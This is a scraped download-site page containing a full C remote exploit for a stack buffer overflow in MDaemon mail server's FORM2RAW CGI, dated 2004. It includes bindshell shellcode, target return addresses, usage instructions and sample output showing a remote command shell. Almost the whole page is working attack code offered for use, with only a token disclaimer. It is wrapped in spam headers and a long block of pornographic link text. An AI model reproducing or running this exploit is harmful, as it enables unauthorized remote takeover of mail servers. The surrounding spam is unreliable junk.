亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? remote exploit for mdaemon version v6.85 and prior to 6.52.txt

?? 一些可以實現益出的程序
?? TXT
字號:
/*
        Copyright ? Rosiello Security
        http://www.rosiello.org
         ================

 <rave> ____________
 <rave> _.-----------------------/ `-,,
 <rave> ,' ; ; / `-._
 <rave> ; ; ; .') \ `\
 <rave> `--------------------.'.' _.-'`- . `\
 <rave> ;`---'-------.\, `\ _
 <rave> ;, ; .---`, ` -
 <rave> ;` ; `.____;
 <rave> `--------------'_ ,,
 <rave> ,; ; .---`, ` ._
 <rave> ;; ; `.____; ___``````
 <rave> `;--------------' `
 <rave> ,; ; .---`,
 <rave> ;; ; `.____;
 <rave> `.------------'
 <rave> ``----...__ _..=
 <rave> `````---=-.---``'`
          _
      | |_
    |_ _|
      |_|

     /\ \ We /\ \ are /\ \
      /::\ \ Black /::\ \ H@t \:\ \
     /:/\:\ \ /:/\:\ \ \:\ \
    _::\~\:\ \ _::\~\:\ \ /::\ \
   /\ \:\ \:\__\ /\ \:\ \:\__\ /:/\:\__\
   \:\ \:\ \/__/ \:\ \:\ \/__/ /:/ \/__/
    \:\ \:\__\ \:\ \:\__\ /:/ /
     \:\/:/ / \:\/:/ / /:/ /
      \::/ / \::/ / /:/ /
       \/__/ \/__/ \/__/ airsupply@0x557.org
                                      http://www.0x557.org
    ================

--== Remote Exploit for Mdaemon version v6.85 and prior to 6.52 ==--
 Code by: rave
 Contact: rave@rosiello.org
 Contact: airsupply@0x557.org
 Date: March 2004


 Bug found by: hat-squad security ( great job !! )

    MDaemon offers a full range of mail server functionality. MDaemon protects your users from
 spam and viruses, provides full security, includes seamless web access to your email via
 WorldClient, remote administration, and much more!".FORM2RAW.exe is a CGI that allows users
 to send emails using the MDaemon via a web page. It processes the fields of an HTML form and
 creates a raw message file in the raw queue directory of MDaemon mail server. This file then
 will be processed and queued for delivery by MDaemon. An attacker can cause a buffer overflow
 in MDaemon by issuing a malformed CGI request to FORM2RAW.exe.

   According to the Help file "By default, MDaemon 6.52 or higher will not send emails created by
 Form2Raw unless the email address passed in the 'from' tag (see below) is a valid account on the
 MDaemon server. If you want to disable this behavior you can set the FromCheck=No in FORM2RAW.INI
 file".

    Sending more than 153 bytes in the "From" field to FROM2Raw.exe creates a raw file that when processed
 by MDaemon will cause a Stack buffer overflow. The EIP register will be overwritten when the From field
 length is 249 bytes

 Do i need to say more ? this is 0wnage 0ldsch00l style have fun..
 This spawns a waiting bindshell on the victims computer at port 58821..


 ps:
 The exploit has only been tested on Windows XP Home and pro edition (dutch) sp1 + the stack
 has been proofen to be verry humpy. So please dont yell it me if the exploit doesn't work on your
 Operative System .. thanks

 The demo mode of the exploit shows in the debugger the following
 EAX = 00000000 EBX = 00000000 ECX = 014D1BD8 EDX = 01090000 ESI = 014C6000 EDI = 01AEF1A8
 EIP = 42424242 ESP = 01AEEEE8 EBP = 0005E668

 Note:Demo mode works on all operative systems

 Usage <C:\Mdeamon>Mdeamon_exp.exe <target host> <target number>
 Target Number Target Name Stack Adress
 ============= =========== ===========
 0 Demo 0x42424242
 1 Windows XP HOME [NL] 0x014D4DFC
 2 Windows XP PRO [NL] 0x014D4DFC

 <C:\Mdeamon> Mdeamon_exp localhost 1
 [+] Winsock Inalized
 [+] Trying to connect to localhost:3000
 [+] socket inalized
 [+] Overflowing string is Prepared
 [+] Connected
 [+] Overflowing string had been send

 <C:\> telnet localhost 58821
 Microsoft Windows XP [versie 5.1.2600]
 C) Copyright 1985-2001 Microsoft Corp.

 D:\MDaemon\APP>

 Special Thanks to:
 airsuppy { 0x557 security r0cked me, ty for u part and cooperationg bro }
 Silicon { Unofficial source`s told me ur a rosiello member good i lent ur bindcode TY 100% }
 Sam { once again 0x557 ty for the chat aldo it was a short one }
 Dragnet { Always willing to help me out }
 Angelo { Verry verry good friend }
 Punix { Last time i forgot you girl ! :( im so sorry }

 Greetz go out to:
 NrAziz { This is my brother anyone who touches him touches me, so pls make my day ! }
 sloth { good guy }
 Mercy { Hope to see u soon }
 Netric security { www.netric.org/.be }
 0x557 security (SST) { www.0x557.org }
 [+] All the hax0rs i forgot.

 This was rosiello there first coorperation with the 0x557 ppl witch have been proofen to be
 realy nice, in the past rosiello has worked with (now death) DSR also known as dtors
 security research, but (and its a personal wish) hope that 0x557 still will be so nice for
 us. I feel my self called to give a great big shoutout to these ppl for there work for now and
 in the futhure !! keep on doing the great job !.

  Bad sounds of these days {
  i cant remember anything , can`t tell of this is trough or a dream. deep down down inside me i ,
  feel the stream this terrable silence stop with me. Now that the warn is trough with me im waking
  up i can not see that there is nothing left of me nothing is real but pain now.

  }

The original advisory can be found at: http://hat-squad.com/bugreport/mdaemon-raw.txt
The mirored advisory can be fount at: http://www.securiteam.com/windowsntfocus/5ZP050ABPY.htm
Our own Advisory can be found at : http://www.rosiello.org/en/read_bugs.php?17

 !!!DO NOT USE THIS CODE ON DIFFERENT MACHINES BUT YOURS!!!
 Respect the law as we do!

I'm outa here bye bye !
*/

#include <stdio.h>
#include <winsock2.h>
#include <errno.h>
#include <windows.h>

// Darn fucking 1337 macro shit
#define ISIP(m) (!(inet_addr(m) ==-1))

#define offset 267 //;267 //1024

// hmm :D
#define NOPS "\x90\x90\x90\x90\x90\x90\x90"

 struct sh_fix
{
 unsigned long _wsasock;
 unsigned long _bind;
 unsigned long _listen;
 unsigned long _accept;
 unsigned long _stdhandle;
 unsigned long _system;
} ;

struct remote_targets {
  char *os;
  unsigned long sh_addr;
  struct sh_fix _sh_fix;
} target [] ={
/* Option`s for your eyes only :D*/
    "Demo ",
     0x42424242,
    { 0x90909090,
      0x90909090,
      0x90909090,
      0x90909090,
      0x90909090,// <--
      0x90909090,
    },

    "Windows XP HOME [NL]",
     0x014D4DFC,
    { 0x71a35a01,
      0x71a33ece,
      0x71a35de2,
      0x71a3868d,
      0x77e6191d,// <--
      0x77bf8044,
    },

    "Windows XP PRO [NL]",
     0x014D4DFC,
    { 0x71a35a01,
      0x71a33ece,
      0x71a35de2,
      0x71a3868d,
      0x77e6191d,// <--
      0x77bf8044,
    }
};

unsigned char _addy [] =
"\x90\x90\x90\x90";

// 116 bytes bindcode for windows,(NTlike) port=58821, by silicon :)
// w000w you rule !!
unsigned char shellcode[] =

"\x83\xC4\xEC\x33\xC0\x50\x50\x50\x6A\x06"
"\x6A\x01\x6A\x02\xB8"
"\xAA\xAA\xAA\xAA"
"\xFF\xD0\x8B\xD8\x33\xC0\x89\x45\xF4\xB0"
"\x02\x66\x89\x45\xF0\x66\xC7\x45\xF2\xE5"
"\xC5\x6A\x10\x8D\x55\xF0\x52\x53\xB8"
"\xBB\xBB\xBB\xBB"
"\xFF\xD0\x6A\x01\x53\xB8"
"\xCC\xCC\xCC\xCC"
"\xFF\xD0\x33\xC0\x50\x50\x53\xB8"
"\xDD\xDD\xDD\xDD"
"\xFF\xD0\x8B\xD8\xBA"
"\xEE\xEE\xEE\xEE"
"\x53\x6A\xF6\xFF\xD2\x53\x6A\xF5\xFF\xD2"
"\x53\x6A\xF4\xFF\xD2\xC7\x45\xFB\x41\x63"
"\x6D\x64\x8D\x45\xFC\x50\xB8"
"\xFF\xFF\xFF\xFF"
"\xFF\xD0\x41";

/* The funny thing is while exploiting this bug one of the adresses
  (see target[1 || 2].sh_addr) had a forbidden character (0x20 aka space) to fix this i wrote
  this addy/mini shellcode tho replace the 0x19 (thats not supposed to be there) in the
  SetStdHandle () adress inside the shellcode for an 0x20.
  */

unsigned char _me [] =
"\x33\xC9" // xor ecx,ecx
"\xBE\xAA\xAA\xAA\xAA" // mov esi,offset _shellcode (00421a50)
"\x83\xC1\x1F" // add ecx,1Fh
"\x41" // inc ecx
"\x66\x89\x4E\x50" // mov word ptr [esi+50h],cx
"\xC6\x46\x51\xE6"; // mov byte ptr [esi+51h],0E6h

// now what would this button do ?
char *host_ip;
u_long get_ip(char *hostname)
{
 struct hostent *hp;

 if (ISIP(hostname)) return inet_addr(hostname);

  if ((hp = gethostbyname(hostname))==NULL)
  { perror ("[+] gethostbyname() failed check the existance of the host.\n");
    exit(-1); }

  return (inet_ntoa(*((struct in_addr *)hp->h_addr)));
}

int fix_shellcode ( int choise )
{
 unsigned long only_xp =target[choise].sh_addr+strlen(NOPS)+strlen(_me);

  memcpy(_me+3,((char *)&only_xp),4);

  //0xf offset to the adres of WSASocketA
  memcpy(shellcode+0xf,((char *)&target[choise]._sh_fix._wsasock),4);

  //0x30 offset to the adres of bind
  memcpy(shellcode+0x30,((char *)&target[choise]._sh_fix._bind),4);

  //0x3a offset to the adres of listen
  memcpy(shellcode+0x3a,((char *)&target[choise]._sh_fix._listen),4);

  //0x46 offset to the adres of _accept
  memcpy(shellcode+0x46,((char *)&target[choise]._sh_fix._accept),4);

  //0x4f offset to the adres of SetStdHandle
  memcpy(shellcode+0x4f,((char *)&target[choise]._sh_fix._stdhandle),4);

  //0x6e offset to the adres of SYSTEM
  memcpy(shellcode+0x6e,((char *)&target[choise]._sh_fix._system),4);

return 0;

}
/// oooh yeah uuuh right .... Crap dont you uuh yeah at me you know me !
int usage (char *what)
{
 int i;

  fprintf(stdout,"Copyright ? Rosiello Security\n");
  fprintf(stdout,"http://www.rosiello.org\n\n");
  fprintf(stdout,"Usage %s <target host> <target number>\n",what);
  fprintf(stdout,"Target Number\t\tTarget Name\t\t\t\tStack Adress\n");
  fprintf(stdout,"=============\t\t===========\t\t\t\t===========\n");

  for (i=0;i < 3;i++)
   fprintf(stdout,"%d\t\t\t%s\t\t0x%p\n",i,target[i].os,target[i].sh_addr);

  exit(0);
}

int main(int argc,char **argv)
{
 char buffer[offset*4]="get /form2raw.cgi?From=",*ptr,*address;
 int sd,oops,i,choise;
 struct sockaddr_in ooh;

 WSADATA wsadata;
 WSAStartup(0x101, &wsadata);

 if (argc < 2) usage(argv[0]);
 address=argv[1];
 choise=atoi(argv[2]);
 fix_shellcode(choise);

 fprintf(stdout,"[+] Winsock Inalized\n");

  /* Lets start making a litle setup
    Change the port if you have to */

  ooh.sin_addr.s_addr = inet_addr(get_ip(address));
    ooh.sin_port = htons(3000);
    ooh.sin_family = AF_INET;

 fprintf(stdout,"[+] Trying to connect to %s:%d\n",address,3000);

 // ok ok here`s ur sock()
 sd = socket(AF_INET, SOCK_STREAM,IPPROTO_TCP);
  if (!sd<0) { fprintf(stderr,"[!] socket() failed.\n");exit (-1); }

  fprintf(stdout,"[+] socket inalized\n");

  /* inalizing the expploiting buffer read the file comments for the details */
 ptr=buffer+strlen(buffer);

 for (i=strlen(buffer);i < offset;i++) *ptr++=(char)0x40;

 sprintf(buffer+strlen(buffer),"%s%s&To=airsupply@0x557.org&Subject=hi&Body=%s%s%s HTTP/1.0\r\n\r\n",
       ((char *)&target[choise].sh_addr),_addy,NOPS,_me,shellcode);

 //memcpy(buffer+35,shellcode,strlen(shellcode));

 fprintf(stdout,"[+] Overflowing string is Prepared\n");

  // Knock knock ... hi i want to hook up with you
  oops=connect(sd, (struct sockaddr *)&ooh, sizeof( ooh ));
   if(oops!=0) { fprintf(stderr,"[!] connect() failed.\n"); exit(-1); }

 // yep wher`e in :D
 fprintf(stdout,"[+] Connected\n");


 // Sending some Dangerous stuff
 i = send(sd,buffer,strlen(buffer),0);
 if (!i <0) { fprintf (stdout,"[!] Send() failed\n"); exit (-1) ; }

 fprintf(stdout,"[+] Overflowing string had been send\n");

 // Bring in the cleaners !!
 WSACleanup();

 // [EOF]
 return 0;

}

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
国产日韩成人精品| 久久成人久久鬼色| 国内成人免费视频| 色欧美日韩亚洲| 日本一二三不卡| 欧美96一区二区免费视频| 91蜜桃免费观看视频| 久久亚洲精华国产精华液| 亚洲高清免费视频| 91在线观看一区二区| 日韩精品在线看片z| 亚洲亚洲人成综合网络| 丰满少妇在线播放bd日韩电影| 91精品视频网| 亚洲妇女屁股眼交7| 99久久精品国产一区| 久久久久久久一区| 久久99国内精品| 91精品国产综合久久国产大片| 亚洲精选视频免费看| av电影天堂一区二区在线| 久久免费美女视频| 精品无人码麻豆乱码1区2区 | 亚洲视频一区二区在线| 免费成人在线视频观看| 欧美三级一区二区| 一区二区三区欧美激情| 日本乱人伦一区| 中文字幕一区二区三区精华液| 成人在线综合网| 国产精品视频麻豆| 成人性生交大片免费看中文网站| 久久久久国产精品厨房| 国产成人免费视频网站 | 国产一区二区三区视频在线播放| 美女视频免费一区| 成人黄色小视频在线观看| 国产人妖乱国产精品人妖| 国产经典欧美精品| 欧美国产97人人爽人人喊| 成人免费观看男女羞羞视频| 国产精品视频第一区| 色综合天天综合网国产成人综合天| 中文字幕在线不卡一区二区三区| 99精品国产99久久久久久白柏| 亚洲欧美色综合| 欧美日韩欧美一区二区| 美女视频免费一区| 国产日韩欧美在线一区| 99在线视频精品| 夜夜嗨av一区二区三区| 欧美一区二区三区播放老司机| 蜜乳av一区二区| 国产精品天天看| 欧美视频精品在线| 精品一区二区三区影院在线午夜| 国产蜜臀av在线一区二区三区| 色综合天天做天天爱| 日韩不卡手机在线v区| 久久伊人中文字幕| 99re在线视频这里只有精品| 亚洲妇女屁股眼交7| 久久久亚洲精品石原莉奈| a美女胸又www黄视频久久| 亚洲mv在线观看| 久久久久久一二三区| 欧美午夜影院一区| 激情五月婷婷综合| 亚洲另类在线制服丝袜| 日韩精品一区二区三区视频播放| av电影在线不卡| 久久99深爱久久99精品| 亚洲精品欧美综合四区| 久久网站热最新地址| 在线观看免费成人| 国产成人久久精品77777最新版本| 亚洲影院理伦片| 国产日韩影视精品| 91精品国产91热久久久做人人| 成人高清免费在线播放| 日韩和欧美的一区| 亚洲美女一区二区三区| 欧美va在线播放| 欧美日韩亚洲综合| 97久久超碰国产精品| 国产精品伊人色| 日韩av电影一区| 亚洲狠狠爱一区二区三区| 国产精品全国免费观看高清| 欧美电影免费观看高清完整版在线| 日本久久电影网| 国产99精品国产| 韩国v欧美v日本v亚洲v| 婷婷久久综合九色综合绿巨人| 中文字幕日本不卡| 中文字幕久久午夜不卡| 精品久久人人做人人爱| 日韩午夜精品电影| 欧美日韩aaaaaa| 日本电影亚洲天堂一区| k8久久久一区二区三区| 国产精品一卡二卡在线观看| 免费黄网站欧美| 日本一区中文字幕| 午夜久久久久久电影| 亚洲国产日韩一区二区| 亚洲精品国产一区二区精华液 | 国产精品电影院| 久久人人超碰精品| 日韩你懂的在线播放| 欧美一级一区二区| 欧美丰满少妇xxxbbb| 欧美日本视频在线| 精品视频资源站| 欧美日韩精品欧美日韩精品一 | 午夜精品福利视频网站| 亚洲午夜在线视频| 首页国产丝袜综合| 日本一道高清亚洲日美韩| 午夜a成v人精品| 日韩av高清在线观看| 日本欧美大码aⅴ在线播放| 日本美女视频一区二区| 久国产精品韩国三级视频| 激情小说欧美图片| 粉嫩久久99精品久久久久久夜| 国产**成人网毛片九色| 99久久精品免费观看| 欧美视频在线一区二区三区| 欧美日韩一二区| 欧美成人精品3d动漫h| 国产欧美精品一区二区三区四区| 欧美国产日韩亚洲一区| 亚洲欧美经典视频| 三级久久三级久久| 国产原创一区二区| 99视频精品免费视频| 欧美性xxxxxx少妇| 精品福利在线导航| 国产精品你懂的在线| 亚洲欧美另类在线| 免费成人在线播放| www.色精品| 欧美军同video69gay| 精品国产伦一区二区三区观看方式 | 樱桃视频在线观看一区| 天堂午夜影视日韩欧美一区二区| 麻豆精品国产传媒mv男同| 成人高清视频在线观看| 欧美日韩成人在线| 欧美国产精品一区| 天天操天天综合网| 成人午夜av电影| 欧美精品乱码久久久久久按摩| 精品国产三级a在线观看| 亚洲人成小说网站色在线| 日本伊人午夜精品| av亚洲精华国产精华精| 欧美一区国产二区| 综合精品久久久| 精品一区二区三区免费观看| 91美女视频网站| 精品国产乱码久久久久久影片| 一区二区三区不卡视频| 国产精品资源在线看| 欧美精品久久久久久久久老牛影院| 久久久久国产免费免费| 日韩综合小视频| 色哟哟精品一区| 久久精品这里都是精品| 日本欧美加勒比视频| 色94色欧美sute亚洲线路二| 国产丝袜美腿一区二区三区| 图片区小说区国产精品视频| 99久久免费国产| 久久精品欧美日韩| 秋霞电影一区二区| 欧美亚洲综合一区| 亚洲欧洲精品一区二区三区| 国产在线精品一区二区不卡了| 在线观看欧美日本| 亚洲日穴在线视频| 成人性生交大片免费| 久久这里只精品最新地址| 日本不卡123| 欧美精品乱码久久久久久按摩| 亚洲一区二区在线免费看| av不卡免费在线观看| 国产视频一区二区在线| 国产资源在线一区| 久久综合五月天婷婷伊人| 麻豆91免费看| 日韩一区二区三区三四区视频在线观看 | 色哦色哦哦色天天综合| 欧美激情在线免费观看| 国产一区欧美一区| 久久久亚洲精华液精华液精华液| 韩国成人精品a∨在线观看| 欧美精品一区二| 国产精品综合久久|